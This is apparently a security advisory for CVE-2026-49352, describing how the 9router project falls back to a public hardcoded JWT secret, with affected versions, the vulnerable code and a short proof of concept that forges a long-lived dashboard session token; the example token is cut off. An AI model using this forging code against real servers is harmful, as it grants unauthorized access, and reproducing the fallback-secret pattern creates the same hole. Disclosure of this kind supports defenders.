CVE-2026-49352
### Summary 9router uses a publicly known hardcoded string `"9router-default-secret-change-me"` as the fallback of JWT secret for all Dashboard session JWTs when the `JWT_SECRET` environment variable is not set. Because this secret is committed in the public repository and unchanged across all releases, any unauthenticated remote attacker can forge a valid `auth_token` cookie and gain full access to dashboard and api (If JWT_SECRET is not set on server) . This vulnerable affected so many public 9router server ### Details | Versions | File | Note | |---|---|---| | `>= 0.2.21, <= 0.4.30` | `src/app/api/auth/login/route.js` + `src/middleware.js` | Introduced in commit `23cfb19` | | `>= 0.4.31, <= 0.4.41` | `src/lib/auth/dashboardSession.js` | Relocated by OIDC refactor `c3d91b0`, secret unchanged | Vulnerable Code **v0.2.21 – v0.4.30** — `src/app/api/auth/login/route.js` and `src/middleware.js`: ```js const SECRET = new TextEncoder().encode( process.env.JWT_SECRET || "9router-default-secret-change-me" ); ``` **v0.4.31 – v0.4.41 (current)** — `src/lib/auth/dashboardSession.js` (centralized via OIDC refactor, commit `c3d91b0`): ```js const SECRET = new TextEncoder().encode( process.env.JWT_SECRET || "9router-default-secret-change-me" ); ``` The fallback string was introduced in commit `23cfb19` (2026-01-09) and has never been removed. The OIDC refactor in `c3d91b0` only relocated it to a shared module . This vulnerability has existed since 9router first introduced authentication. ### PoC **Step 1.** Craft a JWT signed with the known default secret: ```js import { SignJWT } from "jose"; const SECRET = new TextEncoder().encode("9router-default-secret-change-me"); const token = await new SignJWT({ authenticated: true }) .setProtectedHeader({ alg: "HS256" }) .setIssuedAt() .setExpirationTime("36y") .sign(SECRET); console.log(token); // example a valid auth_token=eyJhbGciOiJIUzI1NiJ9.eyJhdXRoZW50aWNhdGVkIjp0cnVlLCJpYXQiOjE3Nzg3Njk4NTYsImV4cCI6MjkxNDg0MzQ1N
Properties
- severity
- critical
- summary
- 9router's Hardcoded Default fallback JWT Secret Allows Authentication Bypass
- epss_score
- 0.00437
- cvss_score
- 9.8
- ghsa_published
- 2026-07-02T20:56:55Z
- source_url
- https://github.com/advisories/GHSA-jphh-m39h-6gwx
- ghsa_updated
- 2026-07-02T20:56:56Z
- ghsa_id
- GHSA-jphh-m39h-6gwx
- cve_id
- CVE-2026-49352
- cvss_vector
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- is_ghsa_only
- false
- epss_percentile
- 0.36406
Related Entities (5)
ENRICHED_BY (1)
VULNERABLE_TO (1)
AFFECTS (1)
HAS_WEAKNESS (1)
REPORTED_BY (1)
Explore deeper with Ninja Signal's threat intelligence graph